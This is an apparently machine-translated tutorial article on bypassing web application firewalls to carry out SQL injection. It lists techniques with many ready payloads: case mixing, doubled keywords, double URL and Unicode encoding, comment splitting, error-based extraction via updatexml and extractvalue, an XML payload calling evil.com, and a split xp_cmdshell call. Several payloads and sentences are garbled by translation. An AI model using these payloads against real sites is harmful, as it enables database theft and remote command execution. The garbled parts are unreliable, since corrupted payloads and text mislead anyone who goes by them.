Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "how to implement SQL injection bypass technology in web security". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Common features of 0x1 WAF

The reason why we want to talk about the common features of WAF is to better understand how WAF works, so as to increase the chances of bypassing it. This article does not introduce WAF in detail, but only talks about a few related points.

Generally speaking, WAF (Web Application Firewall) has the following four functions:

\ 1. Audit device: a session used to intercept all HTTP data or to meet only certain rules

\ 2. Access control device: used to control access to Web applications, including both active and passive security modes

\ 3. Architecture / network design tools: when running in reverse proxy mode, they are used to assign functions, centralized control, virtual infrastructure, etc.

\ 4. WEB application hardening tools: these functions enhance the security of protected Web applications, which can not only shield the inherent weaknesses of WEB applications, but also protect the security risks caused by WEB application programming errors.

Common features of WAF:

Anomaly detection protocol: rejects requests that do not meet the HTTP standard

Enhanced input validation: proxy and server-side validation, not just client-side validation

Whitelist & blacklist: whitelist is suitable for stable We applications, and blacklist is suitable for dealing with known problems

Rule-based and exception-based protection: rule-based blacklist mechanism is more dependent, exception-based protection is more flexible

State management: focus on session protection

In addition, there are Coikies protection, anti-intrusion avoidance technology, response monitoring and information disclosure protection, etc.

If it's a scanner, WAF has its way of identifying it:

Scanner recognition mainly consists of the following points:

1) Scanner fingerprint (head field / request parameter value). Take wvs as an example, there will be obvious identification including Acunetix.

2) the number of times a rule is triggered within a certain period of time in a single IP+ cookie

3) Hidden link tags, etc.

4) Cookie implantation

5) CAPTCHA verification, the scanner cannot automatically fill the CAPTCHA

6) the percentage of the Webserver returning the http status within the single IP request period is 404%. The scanner detects the sensitive directory based on the dictionary, and returns 404 if the file cannot be found.

0x2's method of bypassing WAF

From what I can find so far, I have classified these techniques for bypassing waf into nine categories, ranging from rudimentary to advanced skills.

A) mixed case

B) replace keywords

C) use coding

D) use comments

E) equivalent functions and commands

F) Special symbols

G) HTTP parameter control

H) buffer overflow

I) Integration bypass

A) case bypass

Case bypass is used for keyword matching only for lowercase or uppercase. Regular expressions / express/i cannot be bypassed if they are not case-sensitive. This is the simplest bypass technique.

For example: z.com/index.php?page_id=-15 uNIoN sELecT 1, 2, 3, 4

The possible scenario for the example scenario is that there is handling of case conversion in the rules of filter, but not for every keyword or every case

B) replace keywords

In this case, case conversion cannot be bypassed, and regular expressions replace or delete keywords such as select and union, which can be easily bypassed if they match only once.

For example: z.com/index.php?page_id=-15 UNIunionON SELselectECT 1, 2, 3, 4

It's also a basic technology, and sometimes it's even more complex: SeLSeselectleCTecT, it's not recommended to expect too much.

C) use coding

1.URL coding

Enter a connection in Chrome, which will be URL encoded by non-reserved character browsers, such as space 20, single quotation mark 27, opening parenthesis 28, closing parenthesis 29

Ordinary URL coding may not be bypassed, and there is a situation where URL coding is filtered only once and can be bypassed twice: page.php?id=1%252f%252a*/UNION%252f%252a / SELECT

two。 Hexadecimal coding

For example: z.com/index.php?page_id=-15 /! u%6eion/ /! se%6cect/ 1, 2, 3, 4.

SELECT (extractvalue (0x3C613E61646D696E3C2F613EPower0x2f61))

In the sample code, the former encodes a single character in hexadecimal, while the latter encodes the entire string, which is less common in use.

3.Unicode coding

Unicode has so-called standard coding and non-standard coding. Assuming that the utf-8 we use is standard coding, then the Western European language family uses non-standard coding.

Take a look at some Unicode codes for several commonly used symbols:

Single quotation marks:% u0027,% u02b9,% u02bc,% u02c8,% u2032,% uff07,% c0% 27,% c0%a7,% e0%80%a7

Spaces:% u0020,% uff00,% c0% 20,% c0%a0,% e0%80%a0

Left parenthesis:% u0028,% uff08,% c0% 28,% c0%a8,% e0%80%a8

Right parenthesis:% u0029,% uff09,% c0% 29,% c0%a9,% e0%80%a9

Example:? id=10%D6'%20AND%201=2%23

SELECT'of'='A'; # 1

In the two examples, the former uses double-byte bypass, for example, if the escape operation for single quotation marks is changed to', then it becomes% D6% 5C, which forms a Unicode byte, and single quotation marks can be used normally.

The second example uses a comparison of two different encoded characters, and the result of their comparison may be True or False. The key is that there are many kinds of Unicode encoding, and the blacklist-based filter cannot handle the situation, so as to achieve bypass.

In addition, what you usually hear a little more may be the bypass of utf-7, as well as the bypass of utf-16 and utf-32, the latter from the successful implementation of google bypass, interested friends can learn about it.

Of course, the common codes are binary and octal, which may not all be useful, but examples of using binary will be mentioned later.

D) use comments

Take a look at the common symbols used for annotation: / /,--, / * * /, #,-- +,--,; * *,-- a

1. General comment

For example: z.com/index.php?page_id=-15% 55nION/**/%53ElecT 1, 2, 3, 4

'union%a0select pass from users#

/ * insert comments into the constructed query statement to avoid dependency on spaces or keyword recognition; #,-- + query used to finalize the statement

two。 Inline comment

Inline annotations are used more often than ordinary annotations, and it has a feature /! * / only MySQL can recognize

For example: index.php?page_id=-15 /! UNION/ /! SELECT/ 1

? pageordinidtracnull% 0Aqqqqqqqr / 5000% 55nIOnqqyuqqqyuqqq0A / 0A _ LecctUnix% 0AqqnnaaTime% 0A _ nnaaTime _ 1JI _ 2JI _ 3jue 4...

In both examples, the former uses inline annotations, while the latter also uses normal annotations. A very useful way to use annotations is to split keywords, which can also be achieved by the special symbols discussed later, provided that these characters, including / and *, can be used properly.

E) equivalent functions and commands

Some functions or commands cannot be used because their keywords are detected, but in many cases they can be replaced by equivalent or similar code

1. Function or variable

Hex (), bin () = > ascii ()

Sleep () = > benchmark ()

Concat_ws () = > group_concat ()

Mid (), substr () = > substring ()

@ @ user = = > user ()

@ @ datadir = = > datadir ()

For example: when substring () and substr () cannot be used:? id=1+and+ascii (lower (mid ((select+pwd+from+users+limit+1,1), 1mem1) = 74

Or: substr ((select 'password'), 1mem1) = 0x70

Strcmp (left ('password',1), 0x69) = 1

Strcmp (left ('password',1), 0x70) = 0

Strcmp (left ('password',1), 0x71) =-1

The above examples are used to illustrate that sometimes when a function cannot be used, other functions can be found to replace its implementation. How to deal with the limitations of keywords such as select, uinon, where, etc., will be discussed later in the filter section.

two。 Symbol

And and or may not work, or you can try & & and | whether they can be used or not; and if they cannot be used, you can consider trying them, because if it is not less than or greater than, that is equal to

After looking at the more frequently used spaces, you can use the following symbols to indicate its function:% 20% 09% 0a% 0d% a0 / * /

3. Remote function

MySQL/PostgreSQL supports XML function: Select UpdateXML (','/ script/@x/','src=//evil.com');

? id=1 and 1 = (updatexml (1) concat (0x3a, (select user ()), 1))

SELECT xmlelement (name img,xmlattributes (1as src,'a\ l\ x65rt (1)'as\ 117n\ x65rror)); / / postgresql

? id=1 and extractvalue (1, concat (0x5c, (select table_name from information_schema.tables limit 1)

MySQL, PostgreSQL and Oracle all have many functions of their own. It is practically impossible and costly for filter based on blacklist to cover so many things. It seems that blacklist technology is limited to a certain extent.

F) Special symbols

Here, I have classified all non-alphanumeric characters into the category of special symbols, which have special meanings and usages and involve more information than the previous ones.

Let's take a look at a few examples used in the article "waf Bypass techniques" on Dark Cloud drops:

1. Use backquotes, such as selectversion () `, to pass spaces and regularities, and in special cases to use them as commentators

two。 The magic "- +.", select+id-1+1.from users; "+" is used for string concatenation, "-" and "." It is also used for connections here, avoiding spaces and keyword filtering

3.@ symbol, select@ ^ 1.from users; @ is used for variable definitions such as @ var_name, an @ for user definition, and @ @ for system variables

4.Mysql function () as xxx can also bypass space restrictions without as and spaces select-count (id) test from users; / /

It can be seen that many things can be done by using these characters, and it also confirms the old saying that it is only unexpected and impossible.

I have collected some characters that may play an important role (excluding', *, /, etc.): `, ~,!, @,%, (), [],., -, +, |,

For example:

Keyword split: 'se'+'lec'+'t'

S%E%L%E%C%T 1

1. Aspx net user exec ('ma'+'ster..x'+'p_cm'+'dsh'+'ell "exec")

! And ():'or-+ 2cm -!!'2

In id=1+ (UnI) (oN) + (SeL) (EcT) / / another Access, "[]" is used for tables and columns, and "()" is also used for numerical separation.

At the end of this section, some operators that are somewhat related to these characters are given for reference:

> >

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.